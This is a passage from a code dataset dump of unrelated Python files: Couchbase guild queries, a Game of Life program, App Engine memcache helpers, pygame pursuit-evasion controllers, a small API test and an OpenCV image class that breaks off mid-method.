Have there been changes to player's guild membership status (new invites, kicks from guild etc) since he was offline\n \"\"\"\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket')\n url = 'http://%s:8092/%s/_design/guild/_view/guild_membership_actions?key=\"%s\"' \\\n % (couch_host, couch_bucket, player_id)\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [(row['id'], props.Props(row['value'])) for row in rows] \n\n return []\n\n@utils.print_timing(logger)\n@utils.statsd_timing()\ndef guild_members(guild_id):\n \"\"\"\n List guild's members (including invited) \n \"\"\"\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket')\n url = 
'http://%s:8092/%s/_design/guild/_view/guild_members?key=\"%s\"' \\\n % (couch_host, couch_bucket, guild_id)\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [(row['id'], props.Props(row['value'])) for row in rows] \n\n return []\n\n@utils.print_timing(logger)\n@utils.statsd_timing()\ndef player_guild_memberships(player_id):\n \"\"\"\n List player's relationships with guilds (where he's been invited etc) \n \"\"\"\n couch_cluster = server_config.get('couchbase', 'cluster_hosts')\n couch_cluster = json.loads(couch_cluster) # the cluster list is a JSON string\n couch_host = random.choice(couch_cluster)\n couch_bucket = server_config.get('couchbase', 'bucket')\n url = 'http://%s:8092/%s/_design/guild/_view/player_guild_memberships?key=\"%s\"' \\\n % (couch_host, couch_bucket, player_id)\n resp = requests.get(url)\n\n if resp.json().get('rows'):\n rows = resp.json()['rows']\n if rows:\n return [(row['id'], props.Props(row['value'])) for row in rows] \n\n return []\n\n","sub_path":"src/cage/db/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":8482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
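guild.py repeats the same cluster/bucket/URL boilerplate in every view query. One possible consolidation, assuming the same port-8092 view endpoint and config keys the module already uses (the query_view helper itself is hypothetical, not part of the original code):

```python
# Sketch of a shared helper for the repeated Couchbase view queries above.
import json
import random
import requests

def query_view(config, design, view, **params):
    hosts = json.loads(config.get('couchbase', 'cluster_hosts'))
    bucket = config.get('couchbase', 'bucket')
    url = 'http://%s:8092/%s/_design/%s/_view/%s' % (
        random.choice(hosts), bucket, design, view)
    # view keys must be JSON-encoded, e.g. key='"myguild"'
    resp = requests.get(url, params=params)
    return resp.json().get('rows', [])

# usage sketch:
# rows = query_view(server_config, 'guild', 'guild_view',
#                   key='"myguild"', limit=1, skip=0)
```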
+{"seq_id":"120789311","text":"## Mira Mastoras\n## November 25, 2016\n##\n## prog67.py\n\ndef count_live(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"counts number of neighboring live cells\"\n offsets = [[-1,-1],[-1,0],[-1,1],[0,-1],[0,1],[1,-1],[1,0],[1,1]]\n num_live_cells = 0 \n for x in offsets:\n y = grid[row + x[0]][column + x[1]]\n if y == 1:\n num_live_cells = num_live_cells + 1\n else:\n pass\n return num_live_cells\n \ndef does_cell_die(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"A live cell surrounded by < 2 live cells dies in the next cycle\"\n \"A live cell surrounded by >3 live cells dies in the next cycle\" \n \"returns true if cell dies, false if not\"\n num_live_cells = count_live(row,column,grid)\n if num_live_cells < 2:\n return True\n elif num_live_cells > 3:\n return True\n else:\n return False\n \ndef does_cell_live(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"A live cell surrounded by 2 or 3 live cells continues to live\"\n \"returns true if cell lives, false if not\"\n num_live_cells = count_live(row,column,grid)\n if num_live_cells == 2 or num_live_cells == 3:\n return True\n else:\n return False\n \ndef is_cell_born(row, column, grid):\n \"argument is row #, column # of cell and the whole grid\"\n \"A dead cell/ empty cell surrounded by exactly 3 live cells comes to life\"\n \"returns true if cell is born, false if not\"\n num_live_cells = count_live(row,column,grid)\n if num_live_cells == 3:\n return True\n else:\n return False\n \ndef create_matrix(rows, columns):\n 'creates a new matrix with desired columns and rows of zeroes'\n newmatrix = []\n value = 0\n for r in range(0, rows):\n newrow = []\n for c in range(0, columns):\n newrow.append(value)\n newmatrix.append(newrow) \n return newmatrix\n \ndef embedmatrix(matrix):\n \"embed imputed matrix into larger one that deals with edge cases\"\n r = len(matrix) + 2\n c = len(matrix[0]) + 2\n newmatrix = create_matrix(r,c)\n \n row = 0\n column = 0\n while row < len(matrix):\n while column < len(matrix[row]):\n newmatrix[row+1][column+1] = matrix[row][column]\n column = column + 1\n column = 0 \n row = row + 1\n return newmatrix\n\ndef is_on_edge(row, column, grid):\n \"checks if position in grid is on the edge\"\n \"argument is row #, column # of cell and the whole grid\"\n if row == 0 or column == 0:\n return True\n elif row == len(grid) - 1 or column == len(grid[0]) - 1:\n return True\n else:\n return False\n \ndef nextGen(grid):\n largergrid = embedmatrix(grid)\n ## Now loop through large grid checking if we change small grid values\n row = 0\n column = 0\n while row < len(largergrid):\n while column < len(largergrid[row]):\n if is_on_edge(row,column,largergrid) == True:\n pass\n else:\n if largergrid[row][column] == 1:\n if does_cell_live(row, column, largergrid) == False or does_cell_die(row, column, largergrid) == True:\n grid[row - 1][column - 1] = 0\n else:\n pass\n else:\n if is_cell_born(row, column, largergrid) == True:\n grid[row - 1][column - 1] = 1\n else:\n pass\n column = column + 1\n column = 0 \n row = row + 1\n \n return grid\n\ndef read_to_file(filename):\n \"reads to a file, converts into a matrix\"\n \"argument is desired filename\"\n grid = []\n row = []\n somefile = open(filename, \"r\")\n for line in somefile:\n for x in line.strip():\n row.append(int(x))\n grid.append(row)\n row = []\n somefile.close()\n return grid\n \ndef write_to_file(grid, filename):\n \"writes a 
matrix out to a file\"\n \"argument is matrix and desired file name\"\n outFile = open(filename, \"w\")\n for x in grid:\n for i in x:\n outFile.write(str(i))\n outFile.write(\"\\n\")\n outFile.close()\n\ndef print_grid(matrix):\n \"takes a matrix of 0's and 1's and prints it as . and *'s\"\n for x in matrix:\n for i in x:\n if i == 0:\n print(\". \",end='')\n else:\n print(\"* \",end='')\n print(\"\\n\")\n\ndef run_nextGen(numGens, matrix):\n most_recent = []\n print(\"Generation 0:\")\n print_grid(matrix)\n for x in range(0, numGens):\n most_recent = nextGen(matrix)\n print(\"Generation:\", x + 1)\n print_grid(most_recent)\n matrix = most_recent\n return most_recent\n \ndef life():\n while True:\n filename = input(\"Enter input file name: \")\n try:\n infile = open(filename, \"r\")\n break\n except:\n print(\"No such file. Try again\")\n while True:\n numGens = input(\"How many generations would you like to print? \")\n try:\n numGens = int(numGens)\n break \n except:\n print(\"Not a valid number.\")\n\n file_matrix = read_to_file(filename)\n most_recent = run_nextGen(numGens, file_matrix)\n yesorno = input(\"Would you like to save the latest generation? ('y' to save): \")\n if yesorno == 'y' :\n while True:\n destination = input(\"Enter destination file name: \")\n try:\n filedestination = open(destination, \"r\")\n question = input(\"Do you want to overwrite that file? ('y' to continue): \")\n if question == 'y':\n break\n else:\n pass\n except:\n break\n print(\"Saving data to\" , destination)\n write_to_file(most_recent, destination)\n print(\"End of program.\")\n\n\nlife() \n\n\n","sub_path":"python_samples/prog67.py","file_name":"prog67.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
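A quick standalone sanity check of the Game-of-Life rules prog67.py implements (a live cell with 2-3 neighbours survives, a dead cell with exactly 3 is born, cells beyond the border count as dead): a vertical blinker should return to itself after two steps. This compact step function is a sketch, not the program's own nextGen:

```python
# Standalone check (not prog67's own code): same rules, dead cells
# outside the border, as in the embedded-grid approach above.
def step(grid):
    rows, cols = len(grid), len(grid[0])
    nxt = [[0] * cols for _ in range(rows)]
    for r in range(rows):
        for c in range(cols):
            live = sum(grid[rr][cc]
                       for rr in range(r - 1, r + 2)
                       for cc in range(c - 1, c + 2)
                       if (rr, cc) != (r, c)
                       and 0 <= rr < rows and 0 <= cc < cols)
            nxt[r][c] = 1 if live == 3 or (grid[r][c] and live == 2) else 0
    return nxt

blinker = [[0, 0, 0, 0, 0],
           [0, 0, 1, 0, 0],
           [0, 0, 1, 0, 0],
           [0, 0, 1, 0, 0],
           [0, 0, 0, 0, 0]]
assert step(step(blinker)) == blinker   # period-2 oscillator
```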
+{"seq_id":"154936937","text":"import logging\nimport datetime\nfrom google.appengine.api import memcache \nfrom models import employee as model_employee\nfrom models import skill as model_skill\n\n\"\"\"\n\t@description:\n\t\tSaves the current state of the Employee instance to memcache\n\"\"\" \ndef set_employee(uuid, employee):\n\tmemcache_key = 'employee:'+uuid\n\tmemcache.set(key=memcache_key, value=employee, namespace='razorfish')\n\treturn employee\n\n\"\"\"\n\t@description:\n\t\tGet the Employee from memcache\n\"\"\"\t \ndef get_employee(uuid): \n\temployee = None\n\tmemcache_key = 'employee:'+uuid\n\tmemcache_employee = memcache.get(key=memcache_key, namespace='razorfish')\n\tif memcache_employee is not None:\n\t\temployee = memcache_employee\n\t\tlogging.debug('get_employee() : Returning Employee from memcache')\n\telif uuid != '':\n\t\temployee = model_employee.Employee.get_by_key_name(uuid)\n\t\t# Save the Employee to memcache\n\t\tset_employee(uuid, employee) \n\t\tlogging.debug('get_employee() : Returning Employee from Datastore')\n\t\t\n\treturn employee\n\t\n\"\"\"\n\t@description:\n\t\tSaves the current Employee skills to memcache\n\"\"\" \ndef set_employee_skills(uuid, skills):\n\tmemcache_key = 'employee:'+uuid+':skills'\n\tmemcache.set(key=memcache_key, value=skills, namespace='razorfish')\n\treturn uuid\n\n\"\"\"\n\t@description:\n\t\tGet the current Skills for the Employee\n\"\"\" \ndef get_employee_skills(uuid):\n\tskills = None \n\temployee = None\n\t# TODO: Add get_employee() method to Memcache script\n\tmemcache_key = 'employee:'+uuid+':skills'\n\tmemcache_skills = memcache.get(key=memcache_key, namespace='razorfish')\n\tif memcache_skills is not None:\n\t\tskills = memcache_skills\n\t\tlogging.debug('get_employee_skills() : Returning Employee Skills from memcache')\n\telse:\n\t\temployee = get_employee(uuid)\n\t\tskills = model_skill.Skill.get(employee.skills)\n\t # Store the Employee Skills in memcache\n\t\tset_employee_skills(uuid, skills)\n\t\tlogging.debug('get_employee_skills() : Got Employee from Memcache. 
Returning Employee Skills from Datastore')\n\t\t\n\treturn skills\n\t\n\"\"\"\n\t@description:\n\t\tTemporarily stores errors against a new Employee create action\n\"\"\"\t\t\t \ndef set_employee_create_errors(uuid, errors):\n\tuuid = str(uuid)\n\tmemcache_key = 'employee:'+uuid+':errors'\n\tdone = memcache.set(key=memcache_key, value=errors, namespace='razorfish')\n\treturn done\n\t\n\t\n\"\"\"\n\t@description:\n\t\tGets Temporary errors against a new Employee create action\n\"\"\"\t\t\t \ndef get_employee_create_errors(uuid):\n\tmemcache_key = 'employee:'+uuid+':errors'\n\terrors = memcache.get(key=memcache_key, namespace='razorfish')\n\treturn errors\n\t\n\"\"\"\n\t@description:\n\t\tSaves all Skill instances from the Datastore to memcache\n\"\"\" \ndef set_all_skills():\n\tskills = model_skill.Skill.all()\n\tmemcache_key = 'skills'\n\tmemcache.set(key=memcache_key, value=skills, namespace='razorfish')\n\treturn skills\n\t\t\n\"\"\"\n\t@description:\n\t\tReturns all available Skill Model instances from memcache\n\"\"\"\t\ndef get_all_skills():\n\t# Attempt to get all Skills from Memcache \n\tskills = memcache.get(key='skills', namespace='razorfish')\n\t\n\tif skills is not None:\n\t\tlogging.debug('Returning Skills from Memcache')\n\t\treturn skills\n\t# Else Query them from the Datastore\n\telse:\n\t\tskills = set_all_skills()\n\t\treturn skills\n\n\"\"\"\n\t@description:\n\t\tSaves all instances of Employee to memcache\n\"\"\" \ndef set_all_employees():\n\temployees = model_employee.Employee.all()\n\tmemcache.set(key='employees', value=employees, namespace='razorfish')\n\treturn employees\n\t\n\"\"\"\n\t@description:\n\t\tReturns all available Employee Model instances\n\"\"\"\ndef get_all_employees():\n\t# Attempt to get all Employees from Memcache\n\temployees = memcache.get(key='employees', namespace='razorfish')\n\tif employees is not None:\n\t\tlogging.debug('Returning Employees from Memcache')\n\t\treturn employees\n\t# Else Query them from the Datastore\n\telse:\n\t\temployees = set_all_employees()\n\t\treturn employees\t\n\t\t\n\"\"\"\n\t@description:\n\t\tSets a Skills Search into memcache ONLY\n\"\"\"\ndef set_skills_searches(request):\n\trequest_args = dict()\n\tfor arg in request.arguments():\n\t\trequest_args[arg] = str(request.get(arg))\n\t\t\n\tskills_searches = get_skills_searches()\n\tif skills_searches is not None and len(skills_searches) > 0:\n\t\tskills_searches = skills_searches\n\telse:\n\t\tskills_searches = dict()\n\t\t\n\t# str(datetime.datetime.now().isoformat())\n\tskills_searches[datetime.datetime.now().isoformat()] = request_args\t\t\n\t\n\tmemcache.set(key='skills:searches', value=skills_searches, namespace='razorfish')\n\t\n\treturn True\n\t\n\"\"\"\n\t@description:\n\t\tGets all Skills Searches from memcache ONLY\n\"\"\"\ndef get_skills_searches():\n\tskills_searches = memcache.get(key='skills:searches', namespace='razorfish')\n\tlogging.debug(skills_searches)\n\treturn skills_searches","sub_path":"controllers/memcache.py","file_name":"memcache.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
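Every getter in memcache.py follows the same cache-aside shape: try memcache, fall back to the Datastore, backfill the cache. A hedged sketch of how that could be factored into a single helper (the cached function is hypothetical, not part of the module):

```python
# Illustrative only: the get/set pairs above all follow the cache-aside
# pattern. 'loader' is any zero-argument callable that fetches from the
# Datastore on a cache miss.
from google.appengine.api import memcache

def cached(key, loader, namespace='razorfish'):
    value = memcache.get(key=key, namespace=namespace)
    if value is None:                       # miss: load and backfill
        value = loader()
        memcache.set(key=key, value=value, namespace=namespace)
    return value

# usage sketch:
# employee = cached('employee:' + uuid,
#                   lambda: model_employee.Employee.get_by_key_name(uuid))
```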
+{"seq_id":"451879903","text":"import random\n\nimport numpy as np\nimport pygame\n\nimport dagger\n\nactions = ['FWD', 'BACK', 'LEFT', 'RIGHT']\n\ndef normalize_angle(ang):\n if ang<0:\n ang = ang%(2*np.pi)\n ang = 2*np.pi + ang\n return ang%(2*np.pi)\n\ndef action_to_vecs(action):\n a1 = 0\n if 'FWD' in action:\n a1 = 1\n elif 'BACK' in action:\n a1 = 2\n a2 = 0\n if 'LEFT' in action:\n a2 = 1\n elif 'RIGHT' in action:\n a2 = 2\n return (a1, a2)\n\ndef vecs_to_action(vecs):\n a1 = vecs[0]\n a2 = vecs[1]\n action = []\n if a1 == 1:\n action.append('FWD')\n elif a1 == 2:\n action.append('BACK')\n if a2 == 1:\n action.append('LEFT')\n elif a2 == 2:\n action.append('RIGHT')\n return action\n\nclass VehicleController(object):\n \"\"\"\n Basic class for a vehicle controller - target\n \"\"\"\n\n def __init__(self, vehicle):\n self.vehicle = vehicle\n self.prev_action = ['FWD']\n\n def next_action(self, state=None):\n \"\"\"\n Calculates the next action for the vehicle.\n state: (vehicle1_state, vehicle2_state)\n \"\"\"\n if not state:\n # random walk\n if random.random() > 0.99:\n action = [random.choice(actions)]\n else:\n action = self.prev_action\n self.prev_action = action\n return action\n\nclass UserController(VehicleController):\n \"\"\"\n Controller that has user input...\n \"\"\"\n\n def __init__(self, vehicle):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n self.control_history = []\n self.state_history = []\n\n def next_action(self, state=None):\n control = []\n pygame.event.pump()\n keys = pygame.key.get_pressed()\n #print [i for i in keys if i>0]\n if keys[pygame.K_UP]:\n control.append('FWD')\n if keys[pygame.K_LEFT]:\n control.append('LEFT')\n if keys[pygame.K_DOWN]:\n control.append('BACK')\n if keys[pygame.K_RIGHT]:\n control.append('RIGHT')\n self.state_history.append(state)\n self.control_history.append(control)\n return control\n\nclass BasicEvasionController(VehicleController):\n \"\"\"\n Always travels away from the pursuer.\n \"\"\"\n\n def __init__(self, vehicle):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n\n def next_action(self, state=None):\n \"\"\"\n state: (self vehicle state, other vehicle state)\n \"\"\"\n control = []\n self_state = state[0]\n other_state = state[1]\n pos_diff = [self_state[0]-other_state[0], self_state[1]-other_state[1]]\n heading_diff = normalize_angle(self_state[2]) - normalize_angle(other_state[2])\n # note: normalize heading_diff to be between pi and -pi\n # print heading_diff\n if heading_diff < 0 and np.abs(heading_diff) < np.pi/2:\n control.append('LEFT')\n elif heading_diff > 0 and heading_diff < np.pi/2:\n control.append('RIGHT')\n control.append('FWD')\n return control\n\nclass DaggerPursuitController(VehicleController):\n \"\"\"\n Controller that has dummy user input...\n \"\"\"\n\n def __init__(self, vehicle, model=None):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n # what's the difference between control and action history?\n # well, control history is always the user inputs if there is a user \n # input, while action history\n # is always the actions taken. 
Sometimes they are one and the same.\n self.control_history = []\n self.action_history = []\n self.state_history = []\n self.model = model\n # controls: 'policy_learn', 'user', 'policy'\n # 'policy' doesn't do any learning\n self.control = 'user'\n self.round = 0\n\n def next_action(self, state=None):\n control = []\n pygame.event.pump()\n keys = pygame.key.get_pressed()\n #print [i for i in keys if i>0]\n if keys[pygame.K_UP]:\n control.append('FWD')\n if keys[pygame.K_LEFT]:\n control.append('LEFT')\n if keys[pygame.K_DOWN]:\n control.append('BACK')\n if keys[pygame.K_RIGHT]:\n control.append('RIGHT')\n state = np.concatenate((state[0], state[1]))\n if self.control=='policy_learn':\n self.state_history.append(state)\n action = vecs_to_action(self.model.action(state,\n action_to_vecs(self.prev_action)))\n self.prev_action = action\n # basically, if no key is pressed then we're implicitly agreeing\n # with the provided policy.\n if control or keys[pygame.K_SPACE]:\n self.control_history.append(action_to_vecs(control))\n else:\n self.control_history.append(action_to_vecs(action))\n self.action_history.append(action_to_vecs(action))\n return action\n elif self.control=='policy':\n action = vecs_to_action(self.model.action(state,\n action_to_vecs(self.prev_action)))\n self.prev_action = action\n return action\n else:\n if control:\n self.state_history.append(state)\n self.control_history.append(action_to_vecs(control))\n self.prev_action = control\n self.action_history.append(action_to_vecs(control))\n return control\n\n def train(self):\n \"\"\"\n Resets the round, trains using the new data\n \"\"\"\n self.model.train(self.state_history, self.control_history,\n self.action_history)\n self.control_history = []\n self.state_history = []\n self.action_history = []\n self.round += 1\n\n\nclass DaggerEvasionController(VehicleController):\n \"\"\"\n Controller that has dummy user input...\n \"\"\"\n\n def __init__(self, vehicle, model=None):\n self.vehicle = vehicle\n self.prev_action = 'FWD'\n self.control_history = []\n self.state_history = []\n self.model = model\n self.control = 'policy'\n\n def next_action(self, state=None):\n control = []\n pygame.event.pump()\n keys = pygame.key.get_pressed()\n #print [i for i in keys if i>0]\n # pygame letter-key constants are lowercase (K_w, not K_W)\n if keys[pygame.K_w]:\n control.append('FWD')\n if keys[pygame.K_a]:\n control.append('LEFT')\n if keys[pygame.K_s]:\n control.append('BACK')\n if keys[pygame.K_d]:\n control.append('RIGHT')\n self.state_history.append(state)\n self.control_history.append(control)\n if self.control=='policy':\n action = self.model.action(state,\n action_to_vecs(self.prev_action))\n self.prev_action = action\n return action\n else:\n self.prev_action = control\n return control\n\nclass RLController(VehicleController):\n \"\"\"\n Reinforcement learning controller...\n Basically just a wrapper around a RL model\n \"\"\"\n\n def __init__(self, vehicle, model=None):\n self.vehicle = vehicle\n self.model = model\n self.state_history = []\n self.control_history = []\n self.reward_history = []\n\n def reward(self, state, k=100.0):\n \"\"\"\n Reward function for the pursuit model.\n\n Reward function is k/distance - 1.\n \"\"\"\n p1 = state[0:2]\n p2 = state[5:7]\n dist = np.sqrt(np.dot(p2-p1, p2-p1))\n return k/dist - 1.0\n\n def next_action(self, state=None):\n \"\"\"\n Just get the action from the model.\n \"\"\"\n current_reward = self.reward(state)\n self.reward_history.append(current_reward)\n action = self.model.action(state)\n self.state_history.append(state)\n 
self.control_history.append(action)\n return action\n\n def train(self):\n \"\"\"\n Train the Deep-Q learner\n \"\"\"\n self.model.train(self.state_history, self.control_history,\n self.reward_history)\n self.state_history = []\n self.control_history = []\n self.reward_history = []\n","sub_path":"vehicle_controller.py","file_name":"vehicle_controller.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
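The DAgger controllers above rely on action_to_vecs and vecs_to_action being inverses of each other. A self-contained round-trip check, reimplementing the two helpers compactly with the same precedence rules ('FWD' before 'BACK', 'LEFT' before 'RIGHT'):

```python
# Quick self-contained check (not in the original file) that the
# action <-> vector encoding round-trips for every throttle/steering combo.
def action_to_vecs(action):
    a1 = 1 if 'FWD' in action else 2 if 'BACK' in action else 0
    a2 = 1 if 'LEFT' in action else 2 if 'RIGHT' in action else 0
    return (a1, a2)

def vecs_to_action(vecs):
    action = []
    action += ['FWD'] if vecs[0] == 1 else ['BACK'] if vecs[0] == 2 else []
    action += ['LEFT'] if vecs[1] == 1 else ['RIGHT'] if vecs[1] == 2 else []
    return action

for a1 in range(3):
    for a2 in range(3):
        assert action_to_vecs(vecs_to_action((a1, a2))) == (a1, a2)
```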
+{"seq_id":"174164633","text":"import json\n\nimport requests\n\n\nmy_data = open(\"data.json\", \"r\").read()\n\nresp = requests.post(\"https://reqres.in/api/users\", data=json.loads(my_data))\n\n\nprint(resp)\n\nprint(resp.json())\n\nprint(resp.headers.get(\"Content-Type\"))\nassert resp.json()['job'] == 'Automation', 'Job role doesnt match'\n\n\n","sub_path":"api_test/create_user2.py","file_name":"create_user2.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"384391240","text":"#! usr/bin/python\n# -*- coding:utf-8 -*-\nimport cv2\n\nfrom .coordinate import Rect\nfrom .utils import read_image, bytes_2_img, auto_increment\nfrom .exceptions import NoImageDataError, WriteImageError, TransformError\nimport numpy as np\n\n\nclass _image(object):\n def __init__(self, img=None, flags=cv2.IMREAD_COLOR, path=''):\n \"\"\"\n 基础构造函数\n :param img: 图片数据\n :param flags: 写入图片的cv flags\n :param path: 默认的图片路径, 在读取和写入图片是起到作用\n :return: None\n \"\"\"\n self.tmp_path = path\n self.image_data = None\n if img is not None:\n self.imwrite(img, flags)\n\n def save2path(self, path=None):\n \"\"\"\n 写入图片到文件\n :param path: 写入的文件路径\n :return: None\n \"\"\"\n path = path or self.path\n cv2.imwrite(path, self.imread())\n\n def imwrite(self, img, flags: int = cv2.IMREAD_COLOR):\n \"\"\"\n 往缓存中写入图片数据\n :param img: 写入的图片数据,可以是图片路径/bytes/numpy.ndarray/cuda_GpuMat/IMAGE\n :param flags: 写入图片的cv flags\n :return: None\n \"\"\"\n if isinstance(img, str):\n self.image_data = read_image('{}{}'.format(self.tmp_path, img), flags)\n elif isinstance(img, bytes):\n self.image_data = bytes_2_img(img)\n elif isinstance(img, np.ndarray):\n self.image_data = img.copy()\n elif isinstance(img, cv2.cuda_GpuMat):\n self.image_data = img.clone()\n elif isinstance(img, _image):\n raise TypeError('Please use the clone function')\n else:\n raise WriteImageError('Unknown params, type:{}, img={} '.format(type(img), img))\n\n def imread(self) -> np.ndarray:\n \"\"\"\n 读取图片数据 (内部会自动转换为cpu格式)\n :return: 图片数据(type: numpy.ndarray)\n \"\"\"\n if self.image_data is not None:\n if self.type == 'cpu':\n return self.image_data\n else:\n self.transform_cpu()\n return self.image_data\n else:\n raise NoImageDataError('No Image Data in variable')\n\n def download(self) -> cv2.cuda_GpuMat:\n \"\"\"\n 读取图片数据 (内部会自动转换为gpu格式)\n :return: 图片数据(type: cuda_GpuMat)\n \"\"\"\n if self.image_data is not None:\n if self.type == 'gpu':\n return self.image_data\n else:\n self.transform_gpu()\n return self.image_data\n else:\n raise NoImageDataError('No Image Data in variable')\n\n def clean_image(self):\n \"\"\"\n 清除缓存\n :return: None\n \"\"\"\n self.image_data = None\n\n @property\n def shape(self) -> tuple:\n \"\"\"\n 获取图片的行、宽、通道数\n :return: 行、宽、通道数\n \"\"\"\n if self.type == 'cpu':\n return self.imread().shape\n else:\n return self.download().size()[::-1] + (self.download().channels(),)\n\n @property\n def size(self) -> tuple:\n \"\"\"\n 获取图片的行、宽\n :return: 行、宽\n \"\"\"\n if self.type == 'cpu':\n return self.imread().shape[:-1]\n else:\n return self.download().size()[::-1]\n\n def clone(self):\n \"\"\"\n 返回一份copy的IMAGE\n :return: IMAGE\n \"\"\"\n if self.type == 'cpu':\n return IMAGE(self.imread(), self.path)\n else:\n return IMAGE(self.download(), self.path)\n\n @property\n def path(self):\n \"\"\"\n 获取图片的默认存放路径\n :return: tmp_path\n \"\"\"\n return self.tmp_path\n\n def transform_gpu(self):\n \"\"\"\n 将图片数据转换为cuda_GpuMat\n :return: None\n \"\"\"\n img = self.image_data\n if isinstance(img, np.ndarray):\n img = cv2.cuda_GpuMat()\n img.upload(self.imread())\n self.imwrite(img)\n elif isinstance(img, cv2.cuda_GpuMat):\n pass\n else:\n raise TransformError('transform Error, img type={}'.format(type(img)))\n\n def transform_cpu(self):\n \"\"\"\n 将图片数据转换为numpy.ndarray\n :return: None\n \"\"\"\n img = self.image_data\n if isinstance(img, cv2.cuda_GpuMat):\n img = img.download()\n self.imwrite(img)\n elif isinstance(img, np.ndarray):\n pass\n else:\n raise TransformError('transform Error, img 
type={}'.format(type(img)))\n\n @property\n def type(self):\n \"\"\"\n 获取图片数据的类型\n :return: 'cpu'/'gpu'\n \"\"\"\n if isinstance(self.image_data, np.ndarray):\n return 'cpu'\n elif isinstance(self.image_data, cv2.cuda_GpuMat):\n return 'gpu'\n\n\nclass IMAGE(_image):\n SHOW_INDEX = auto_increment()\n\n def imshow(self, title: str = None):\n \"\"\"\n 以GUI显示图片\n :param title: cv窗口的名称, 不填写会自动分配\n :return: None\n \"\"\"\n title = str(title or self.SHOW_INDEX())\n cv2.namedWindow(title, cv2.WINDOW_KEEPRATIO)\n cv2.imshow(title, self.imread())\n\n def rotate(self, angle: int = 90, clockwise: bool = True):\n \"\"\"\n 旋转图片\n :param angle: 旋转角度, 默认为90\n :param clockwise: True-顺时针旋转, False-逆时针旋转\n :return: self\n \"\"\"\n img = self.imread()\n if clockwise:\n angle = 360 - angle\n rows, cols, _ = img.shape\n center = (cols / 2, rows / 2)\n mask = img.copy()\n mask[:, :] = 255\n M = cv2.getRotationMatrix2D(center, angle, 1)\n top_right = np.array((cols, 0)) - np.array(center)\n bottom_right = np.array((cols, rows)) - np.array(center)\n top_right_after_rot = M[0:2, 0:2].dot(top_right)\n bottom_right_after_rot = M[0:2, 0:2].dot(bottom_right)\n new_width = max(int(abs(bottom_right_after_rot[0] * 2) + 0.5), int(abs(top_right_after_rot[0] * 2) + 0.5))\n new_height = max(int(abs(top_right_after_rot[1] * 2) + 0.5), int(abs(bottom_right_after_rot[1] * 2) + 0.5))\n offset_x, offset_y = (new_width - cols) / 2, (new_height - rows) / 2\n M[0, 2] += offset_x\n M[1, 2] += offset_y\n self.imwrite(cv2.warpAffine(img, M, (new_width, new_height)))\n return self\n\n def crop_image(self, rect):\n \"\"\"\n 区域范围截图,并将截取的区域构建新的IMAGE\n :param rect: 需要截图的范围,可以是Rect/[x,y,width,height]/(x,y,width,height)\n :return: 截取的区域\n \"\"\"\n img = self.imread()\n height, width = self.size\n if isinstance(rect, (list, tuple)) and len(rect) == 4:\n rect = Rect(*rect)\n elif isinstance(rect, Rect):\n pass\n else:\n raise ValueError('unknown rect: type={}, rect={}'.format(type(rect), rect))\n if not Rect(0, 0, width, height).contains(rect):\n raise OverflowError('Rect不能超出屏幕 rect={}, tl={}, br={}'.format(rect, rect.tl, rect.br))\n # 获取在图像中的实际有效区域:\n x_min, y_min = int(rect.tl.x), int(rect.tl.y)\n x_max, y_max = int(rect.br.x), int(rect.br.y)\n return IMAGE(img[y_min:y_max, x_min:x_max])\n\n def binarization(self):\n \"\"\"\n 使用大津法将图片二值化,并返回新的IMAGE\n :return: new IMAGE\n \"\"\"\n gray_img = self.cvtColor(dst=cv2.COLOR_BGR2GRAY)\n if self.type == 'cpu':\n retval, dst = cv2.threshold(gray_img, 0, 255, cv2.THRESH_OTSU)\n return IMAGE(dst)\n else:\n # cuda.threshold 不支持大津法\n retval, dst = cv2.threshold(gray_img.download(), 0, 255, cv2.THRESH_OTSU)\n img = cv2.cuda_GpuMat()\n img.upload(dst)\n return IMAGE(img)\n\n def rectangle(self, rect: Rect):\n \"\"\"\n 在图像上画出矩形\n :param rect: 需要截图的范围,可以是Rect/[x,y,width,height]/(x,y,width,height)\n :return: None\n \"\"\"\n pt1 = rect.tl\n pt2 = rect.br\n cv2.rectangle(self.imread(), (pt1.x, pt1.y), (pt2.x, pt2.y), (0, 255, 0), 2)\n\n def resize(self, w, h):\n \"\"\"\n 调整图片大小\n :param w: 需要设定的宽\n :param h: 需要设定的厂\n :return: self\n \"\"\"\n if self.type == 'cpu':\n img = cv2.resize(self.imread(), (int(w), int(h)))\n else:\n img = cv2.cuda.resize(self.download(), (int(w), int(h)))\n self.imwrite(img)\n return self\n\n def cv2_to_base64(self):\n \"\"\"\n 将图片数据转换为base64格式\n :return: base64格式的图片数据\n \"\"\"\n data = cv2.imencode('.png', self.imread())\n return data\n\n def cvtColor(self, dst):\n \"\"\"\n 转换图片颜色空间\n :param dst: Destination image\n :return: cuda_GpuMat/numpy.ndarry\n \"\"\"\n if self.type == 'cpu':\n 
